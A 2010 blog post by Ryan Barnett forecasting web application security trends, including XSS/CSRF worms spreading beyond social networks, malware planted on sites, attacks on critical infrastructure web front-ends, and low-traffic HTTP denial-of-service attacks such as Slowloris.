Monday, January 18, 2010

2010 Web Application Security Predictions

Submitted by Ryan Barnett 01/18/2010

It is always an interesting exercise to analyze web application security compromises and then try and predict what might happen in the future. Based on the data gathered by the
WASC Web Hacking Incident Database (WHID) and other resources such as datalossdb, etc... there are a few types of incidents that seem probable for the 12 months.

Web-based worms will migrate off social networking sites


As we have seen from the previous sections, social networking types of web sites have fallen victim to web-based XSS/CSRF worms. It seems as though these types of web sites are a perfect testing ground for these types of attack mechanisms, however the attackers ideally want to migrate these attacks off to other types of web sites.

We believe that attackers will utilize Web 2.0 features such as RSS feeds, AJAX and widgets to propagate malicious code on other web sites. A Probable target for attackers, due to its enormous user base, is iPhone financial web apps such as:

  • Mint

  • Bank of America Online Banking

  • E*Trade Mobile

  • Bloomberg Mobile

Planting of malware will become a top concern

Organizations can not afford to allow their web sites to serve malicious content to their customers. If this happens, consumer confidence will waiver and may cause them to move elsewhere. Another impact is that high profile web search engines such as Google may tag the web site as malicious and warn users. This negatively impacts Search Engine Optimization (SEO) efforts.

This is one of those scenarios that can directly impact the bottom-line such as stock prices. Due to this risk level – organizations will focus more efforts on security capabilities to inspect outbound content to ensure that it is non-malicious.

Attacks against web-based critical infrastructure components

It is no secret that terrorists and adversarial nation-states are seeking the capabilities to attack and disrupt critical infrastructures in the United States. Nuclear power plants, power grids, transportation control systems are all targets and they also share a similar capability – they often have web-based front-ends. The bad guys are seeking to exploit web-based flaws in order to be able to obtain access to data or the ability to shut down or cause a denial of service condition.

HTTP Denial of Service attacks will take down important sites

Whereas network level DoS attacks aim to flood your pipe with lower-level OSI traffic (SYN packets, etc...), web application layer DoS attacks can often be achieved with much less traffic. Just take a look at Rsnake's Slowloris app if you want to see a perfect example of the fragility of web server availability. The point here is that the amount of traffic which can often cause an HTTP DoS condition is often much less than what a network level device would identify as anomalous and therefore would not report on it as they would with traditional network level botnet DDoS attacks.

Network DDoS attacks aimed at web sites can still be effective if the circumstances are right, however there are other web application specific types of attacks that are much more effective while simultaneously requiring much less traffic. Odds are that there will be a number of high profile web sites that are knocked offline during 2010.